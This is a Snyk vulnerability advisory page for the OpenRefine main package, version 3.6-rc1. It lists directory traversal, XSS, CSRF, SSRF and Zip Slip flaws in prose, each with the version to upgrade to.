Homepage
About Snyk

org.openrefine:main@3.6-rc1 vulnerabilities

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the org.openrefine:main package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Directory Traversal

Affected versions of this package are vulnerable to Directory Traversal via the LoadLanguageCommand component due to improper sanitization of the strLang parameter. An attacker can read arbitrary JSON files on the system by manipulating the strLang parameter to construct a path outside of the intended directory.

How to fix Directory Traversal?

Upgrade org.openrefine:main to version 3.8.3 or higher.

[,3.8.3)
  • M
Cross-site Scripting (XSS)

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the ExportRowsCommand component due to improper sanitization of the Content-Type header. An attacker can execute arbitrary JavaScript in the user's browser by leading a user to a malicious page that submits a form POST containing embedded JavaScript.

Note:

This is only exploitable if the attacker knows a valid project ID of a project that contains at least one row.

How to fix Cross-site Scripting (XSS)?

Upgrade org.openrefine:main to version 3.8.3 or higher.

[,3.8.3)
  • M
Cross-site Request Forgery (CSRF)

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) through the PreviewExpressionCommand process due to missing validation of the CSRF token. An attacker can exploit this vulnerability by convincing a user to visit a malicious website and interact with a crafted page that submits a POST request without the user's consent.

Note: This is only exploitable if the attacker knows a valid project ID and the project contains at least one row.

How to fix Cross-site Request Forgery (CSRF)?

Upgrade org.openrefine:main to version 3.8.3 or higher.

[,3.8.3)
  • M
Server-side Request Forgery (SSRF)

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) which allows unauthorized users to exploit the system, potentially leading to unauthorized access to internal resources and sensitive file disclosure.

How to fix Server-side Request Forgery (SSRF)?

Upgrade org.openrefine:main to version 3.6.0 or higher.

[,3.6.0)
  • M
Arbitrary File Write via Archive Extraction (Zip Slip)

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) via project import, when a carefully crafted malicious OpenRefine project tar file can be used to trigger arbitrary code execution if a user can be convinced to import it.

How to fix Arbitrary File Write via Archive Extraction (Zip Slip)?

Upgrade org.openrefine:main to version 3.7.4 or higher.

[,3.7.4)
Go back to all versions of this package